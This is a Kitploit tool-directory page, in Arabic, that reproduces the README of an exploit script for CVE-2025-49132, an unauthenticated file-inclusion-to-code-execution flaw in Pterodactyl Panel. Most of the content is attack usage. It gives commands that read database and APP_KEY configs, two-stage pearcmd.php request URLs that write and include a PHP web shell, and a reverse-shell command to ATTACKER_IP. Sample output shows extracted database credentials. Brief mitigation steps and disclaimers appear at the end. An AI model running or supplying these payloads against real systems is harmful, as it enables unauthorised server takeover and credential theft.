Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49132 — CVE لـ Pterodactyl (للدراسة والتعليم) | Kitploit
أدوات/GitHubGitHub/popyue/cve-2025-49132
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubpopyue/cve-2025-49132

CVE-2025-49132

CVE لـ Pterodactyl (للدراسة والتعليم)

عرض المستودع
4منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-49132 - استغلال Pterodactyl Panel

⚠️ إخلاء مسؤولية: تم إنشاء هذا المستودع لأغراض تعليمية وبحثية فقط كجزء من بحثي الأمني لفهم وتوثيق CVE-2025-49132. كل الفضل في اكتشاف الثغرة يعود إلى الباحث(ة) الأصلي(ة).

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Pterodactyl Panel - Unauthenticated LFI to RCE Exploit

📋 الوصف

CVE-2025-49132 هي ثغرة تضمين ملف محلي غير مصادق عليه (LFI) في Pterodactyl Panel يمكن تصعيدها إلى تنفيذ تعليمات برمجية عن بُعد (RCE) عبر pearcmd.php الخاص بـ PHP.

توجد الثغرة في نقطة النهاية /locales/locale.json، التي تفشل في تعقيم المعاملين locale وnamespace بشكل صحيح، مما يسمح للمهاجمين بقراءة ملفات إعدادات PHP التعسفية وتحقيق تنفيذ التعليمات البرمجية.

🎯 الإصدارات المتأثرة

الحالةالإصدار
❌ متأثر<= 1.11.10
✅ مُصحَّح>= 1.11.11

⚡ الميزات

  • وضع LFI: قراءة ملفات إعدادات PHP (بيانات اعتماد قاعدة البيانات، APP_KEY، إلخ.)
  • وضع RCE: تنفيذ تعليمات برمجية عن بُعد عبر تقنية LFI2RCE باستخدام pearcmd.php
  • قشرة تفاعلية: قشرة مستمرة لتنفيذ أوامر متعددة
  • أمر واحد: تنفيذ أمر لمرة واحدة
  • مخرجات منسقة: مخرجات ملوّنة ومنسقة لقراءة أفضل

📦 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# Install dependencies
pip install requests

المتطلبات

  • Python 3.6+
  • مكتبة requests
  • curl (لوضع RCE)

🚀 الاستخدام

LFI - قراءة ملفات الإعدادات

root@kitploit:~
# Read database configuration
python exploit.py -u http://target.com --read -p ../../config -f database

# Read application configuration (contains APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app

# Read other configurations
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail

RCE - تنفيذ الأوامر عن بُعد

root@kitploit:~
# Single command execution
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# Interactive shell mode
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# Reverse shell
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

مسارات PEAR الشائعة

التوزيعةالمسار
Debian/Ubuntu../../../../../../usr/share/php
SUSE/OpenSUSE../../../../../../usr/share/php/PEAR

📖 الوسائط

🔬 كيف يعمل

LFI (تضمين الملفات المحلية)

تقبل نقطة النهاية الضعيفة /locales/locale.json المعاملين locale وnamespace:

root@kitploit:~
GET /locales/locale.json?locale=../../config&namespace=database

وهذا يسمح بقراءة أي ملف PHP يعيد مصفوفة، بما في ذلك ملفات إعدادات Laravel.

RCE (تنفيذ التعليمات البرمجية عن بُعد)

يربط الاستغلال بين LFI وpearcmd.php لتحقيق RCE:

  1. المرحلة 1: استخدم أمر config-create في pearcmd.php لكتابة قشرة ويب PHP

    root@kitploit:~
    /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system(...)?>+/tmp/shell.php
    
  2. المرحلة 2: ضمّن القشرة المكتوبة عبر LFI

    root@kitploit:~
    /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=<hex_encoded_cmd>
    

📸 لقطات الشاشة

LFI - قراءة إعدادات قاعدة البيانات

root@kitploit:~
════════════════════════════════════════════════════════════
  DATABASE CONFIGURATION
════════════════════════════════════════════════════════════

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

────────────────────────────────────────────────────────────
[+] Configuration extracted successfully!

RCE - تنفيذ الأوامر

root@kitploit:~
[*] Target: http://panel.example.com
[*] Executing command: id
[*] Writing payload to: /tmp/cmd_abc123.php
[+] Output:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------

🛡️ التخفيف

  1. حدّث Pterodactyl Panel إلى الإصدار 1.11.11 أو أحدث
  2. نفّذ التحقق المناسب من صحة الإدخال لمعاملَي locale وnamespace
  3. استخدم قائمة سماح للقيم الصالحة لـ locale/namespace
  4. قيّد توجيه register_argc_argv في PHP

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض التعليم واختبار الاختراق المصرح به فقط.

  • استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة

استخدمها بمسؤولية وأخلاقية.

📚 المراجع

  • الموقع الرسمي لـ Pterodactyl Panel
  • مستودع Pterodactyl Panel على Github
  • تفاصيل CVE-2025-49132
  • CVE-2025-49132: لوحة Pterodactyl تسمح بتنفيذ تعليمات برمجية عشوائية عن بُعد دون مصادقة
  • تقنية PEAR LFI إلى RCE
  • مولّد سلسلة فلاتر PHP
  • تضمين الملفات المحلية حتى تنفيذ التعليمات البرمجية عن بُعد (RCE)

📝 سجل التغييرات

  • v1.0.0 - الإصدار الأولي
    • قراءة إعدادات LFI
    • RCE عبر pearcmd
    • وضع القشرة التفاعلية
    • مخرجات منسقة وجميلة

⭐ امنح هذا المستودع نجمة إذا وجدته مفيدًا!

تنزيل الأداة
CentOS/RHEL../../../../../../usr/share/pear
Alpine../../../../../../usr/share/php8
الوسيطالوصف
-u, --urlعنوان الهدف (مطلوب)
-p, --pathمسار العبور لـ LFI أو مسار PEAR لـ RCE
-f, --fileملف PHP للقراءة (بدون امتداد .php)
--readتفعيل وضع القراءة LFI
--rceتفعيل وضع RCE
--cmdالأمر المراد تنفيذه (وضع التنفيذ الفردي)
--sdirالدليل لكتابة الشيل (الافتراضي: /tmp)
--snameاسم ملف الشيل (الافتراضي: shell)